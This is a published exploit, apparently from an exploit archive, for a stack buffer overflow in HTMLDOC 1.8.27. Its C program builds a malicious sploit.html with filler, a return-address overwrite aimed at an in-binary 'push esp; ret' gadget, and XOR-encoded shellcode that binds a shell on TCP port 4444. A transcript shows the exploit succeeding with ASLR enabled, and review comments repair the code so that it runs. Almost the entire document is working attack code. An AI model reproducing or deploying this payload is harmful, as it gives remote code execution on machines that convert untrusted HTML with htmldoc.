
# Title : HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit
# Published : 2009-09-09
# Author : Pankaj Kohli


/*

HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux)
Reference: http://www.securityfocus.com/bid/35727

Tested on HTMLDOC 1.8.27 on Debian 5.0 with ASLR enabled (randomize_va_space = 2, see transcript below).
ASLR is sidestepped rather than defeated: the overwritten return address points at a `push esp; ret`
gadget inside the htmldoc binary itself (0x0804d938, i.e. presumably a non-PIE image loaded at a fixed
address, which randomize_va_space=2 does not relocate), and that gadget transfers control to the payload
wherever the randomized stack happens to be. A PIE build, or a binary compiled differently from the
author's, will need a different gadget address.
Credit: ANTHRAX666 for finding the vulnerability

Coded by Pankaj Kohli
http://www.pank4j.com

pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space
2
pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f
pankaj@zion:~/test/htmldoc$ ./htmldocb0f

[*] Creating buffer
[*] Exploit file written to sploit.html
Run as: htmldoc -f somefile.pdf sploit.html

pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html &
[1] 3287
pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN

*/

#include <stdio.h>
#include <string.h>


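/*
 * Port-binding shellcode: the resulting process listens on TCP 4444 (see the
 * netstat transcript above). The leading 25-byte stub (jmp/call/pop to find
 * its own address, then a decode loop) appears to XOR the following 0x75 bytes
 * with key 0x1e before jumping into them -- derived from reading the stub bytes,
 * not from documentation. The payload contains no NUL byte, so it survives
 * being appended with strcat() in main().
 *
 * NOTE(review): the hex escapes were mangled in transit ("xeb" instead of "\xeb");
 * restored here so the array holds the 142 payload bytes rather than 426 ASCII
 * characters, which would also have overrun buff[512] in main().
 */
char code[] =
"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34"
"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05"
"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f"
"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff"
"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f"
"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f"
"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e"
"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff"
"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c"
"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21"
"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d"
"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78"
"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff"
"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5"
"\xd3\x9e";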

/*
 * Value written over the saved return address: a `push esp; ret` gadget in the
 * htmldoc binary, which bounces execution onto the stack where the payload sits.
 * Specific to the author's build (HTMLDOC 1.8.27 on Debian 5.0); other builds
 * need a different address.
 */
long jmp = 0x0804d938L;

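/*
 * Builds sploit.html: the "<!-- MEDIA SIZE 1x1" comment that reaches the
 * vulnerable handler, 275 bytes of filler, the 4-byte return-address
 * overwrite (little-endian), then the shellcode. Returns 0 on success,
 * 1 if the payload does not fit or the output file cannot be written.
 *
 * NOTE(review): the "\n" escapes in the printf strings were mangled in
 * transit ("n[*]"); restored to match the transcript in the header.
 */
int main(int argc, char **argv, char **envp) {
	char buff[512];
	int i;
	FILE *fd;

	(void)argc;
	(void)argv;
	(void)envp;

	printf("\n[*] Creating buffer\n");
	/* 19-byte prefix; the filler starts right after it at offset 19. */
	strcpy(buff, "<!-- MEDIA SIZE 1x1");
	for(i=0; i<275; i++) {
		buff[19+i] = 'A';
	}

	/* Offsets 294..297: saved EIP overwrite, least-significant byte first (x86). */
	buff[294] = (char)(jmp & 0x000000ff);
	buff[295] = (char)((jmp & 0x0000ff00) >> 8);
	buff[296] = (char)((jmp & 0x00ff0000) >> 16);
	buff[297] = (char)((jmp & 0xff000000) >> 24);
	buff[298] = 0;

	/* The builder itself must not overflow: 298 bytes are used, strcat needs strlen(code)+1 more. */
	if (strlen(code) + 1 > sizeof buff - 298) {
		fprintf(stderr, "[-] Shellcode too long for buffer\n");
		return 1;
	}
	strcat(buff, code);

	fd = fopen("sploit.html", "wb");
	if (fd == NULL) {
		perror("[-] fopen sploit.html");
		return 1;
	}
	fprintf(fd, "%s", buff);
	/* fclose flushes the data; a failure here means the file on disk is incomplete. */
	if (fclose(fd) != 0) {
		perror("[-] fclose sploit.html");
		return 1;
	}
	printf("[*] Exploit file written to sploit.html\n");
	printf("Run as: htmldoc -f somefile.pdf sploit.html\n\n");

	return 0;
}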
